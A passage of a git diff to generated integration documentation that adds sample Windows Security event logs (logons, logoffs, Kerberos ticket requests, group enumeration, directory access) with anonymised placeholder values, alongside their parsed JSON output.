"AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + 
"log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } + + ``` + + +=== "security_event_4769.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. 
Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. 
Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le 
compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": 
"Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } + + ``` + + === "security_event_4771.json" ```json 
@@ -2582,6 +4016,117 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "security_event_4798.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": 
"ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } + + ``` + + === "security_event_4964.json" ```json @@ -2767,11 +4312,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" 
@@ -2895,13 +4435,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md index cfd6eff2e..132cd3c5f 100644 --- a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md +++ b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b_sample.md 
@@ -1658,6 +1658,333 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_event_4624" + + + ```json + { + "agent": { + "version": "7.0.0", + "hostname": "hostname", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "type": "winlogbeat" + }, + "host": { + "hostname": "hostname", + "os": { + "version": "10.0", + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "platform": "windows", + "name": "Windows Server 2019 Datacenter" + }, + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "architecture": "x86_64" + }, + "type": "winlogbeat", + "ecs": { + "version": "1.0.0" + }, + "event": { + "created": "2024-11-12T08:41:07.164Z", + "action": "Logon", + "code": 4624, + "kind": "event" + }, + "tags": [ + "beats_input_codec_plain_applied" + ], + "winlog": { + "keywords": [ + "Audit Success" + ], + "api": "wineventlog", + "version": 2, + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "record_id": 1170100815, + "event_data": { + "TargetLinkedLogonId": "0x0", + "IpPort": "29051", + "TargetOutboundUserName": "-", + "ImpersonationLevel": "%%1833", + "TargetDomainName": "DOMAIN", + "TargetOutboundDomainName": "-", + "IpAddress": "1.2.3.4", + "LogonProcessName": "Process ", + "WorkstationName": "WS-USER-01", + "LmPackageName": "-", + "SubjectUserSid": "S-1-2-3", + "ProcessId": "0x2f0", + "VirtualAccount": "%%1843", + "SubjectLogonId": "0x3e7", + "KeyLength": "0", + "RestrictedAdminMode": "-", + "TargetUserSid": "S-4-5-6", + "ElevatedToken": "%%1843", + "SubjectUserName": "WS-USER-01$", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "TransmittedServices": "-", + "LogonType": "3", + "SubjectDomainName": "DOMAIN", + "TargetUserName": "target_user", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "TargetLogonId": "0xfcebb74a", + "AuthenticationPackageName": 
"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0" + }, + "event_id": 4624, + "computer_name": "hostname.company.com", + "channel": "Security", + "task": "Logon", + "provider_name": "Microsoft-Windows-Security-Auditing", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "opcode": "Info" + }, + "log": { + "level": "information" + }, + "message": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. 
the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "@version": "1", + "@timestamp": "2024-11-12T08:41:05.803Z" + } + ``` + + + +=== "security_event_4625" + + + ```json + { + "@timestamp": "2024-11-12T08:40:34.260Z", + "event": { + "action": "Logon", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4625", + "created": "2024-11-12T08:40:35.900Z", + "kind": "event", + "dataset": "system.security" + }, + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "activity_id": "{12345678-ABCD-EFAB-CDEF-123456789012}", + "keywords": [ + "Audit Failure" + ], + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "channel": "Security", + "task": "Logon", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "event_data": { + "SubjectUserSid": "S-1-2-3", + "FailureReason": "%%2313", + "IpPort": "-", + "KeyLength": "0", + "Status": "0xc000006d", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "LogonType": "3", + 
"IpAddress": "-", + "LogonProcessName": "Channel", + "SubjectLogonId": "0x3e7", + "SubStatus": "0xc0000064", + "WorkstationName": "WORKSTATION", + "SubjectDomainName": "J_DOE", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "SubjectUserName": "WORKSTATION$", + "LmPackageName": "-", + "ProcessId": "0x338", + "AuthenticationPackageName": "Kerberos" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "WORKSTATION.johndoe.com", + "record_id": 2552812283, + "event_id": "4625" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "WORKSTATION", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-2222-3333-4444-555555555555" + }, + "host": { + "hostname": "hostname", + "architecture": "x86_64", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "hostname", + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "os": { + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2016 Datacenter", + "build": "14393.7428", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "fe80::1234:5678:90ab:cde", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "4.3.2.1", + "fe80::aaaa:bbbb:cccc:dddd", + "1.2.3.4", + "fe80::1234:abcd:ef", + "fe80::abcd:1234:567", + "fe80::a0b1:c2d:3e4" + ] + }, + "tags": [ + "Windows", + "beats_input_raw_event" + ] + } + ``` + + + +=== "security_event_4634" + + + ```json + { + "@timestamp": "2024-11-12T08:42:47.895Z", + "event": { + "action": "Logoff", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4634", + "created": "2024-11-12T08:42:48.190Z", + "kind": "event", + "dataset": "system.security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount 
Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." + }, + "message": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.", + "elastic_agent": { + "version": "8.14.1", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "task": "Logoff", + "channel": "Security", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "event_data": { + "TargetUserName": "ACCOUNT", + "TargetLogonId": "0x5ed35bb6", + "TargetUserSid": "S-1-2-3", + "LogonType": "3", + "TargetDomainName": "J_DOE" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "PC01.jdoe.com", + "record_id": 15983780774, + "event_id": "4634" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "PC01", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "ephemeral_id": "11111111-2222-3333-4444-555555555555" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "pc01", + "architecture": "x86_64", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": 
"pc01", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2019 Standard", + "build": "17763.6414", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + } + } + ``` + + + === "security_event_4648" 
@@ -1751,112 +2078,851 @@ In this section, you will find examples of raw logs as generated natively by the "type": "windows", "family": "windows" }, - "hostname": "HOST01", + "hostname": "HOST01", + "ip": [ + "1.2.3.4", + "fe80::abcd:123:456" + ] + }, + "event_ingest_logstash": "2023-11-09T09:05:14.912238Z", + "fields.gdp-logstash": "5", + "@version": "1" + } + ``` + + + +=== "security_event_4662" + + + ```json + { + "log": { + "level": "information" + }, + "@timestamp": "2024-11-12T09:07:11.844Z", + "message": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "tags": [ + "beats_input_codec_plain_applied" + ], + "event": { + "created": "2024-11-12T09:07:13.714Z", + "action": "Directory Service Access", + "provider": "Microsoft-Windows-Security-Auditing", + "outcome": "success", + "code": "4662", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet 
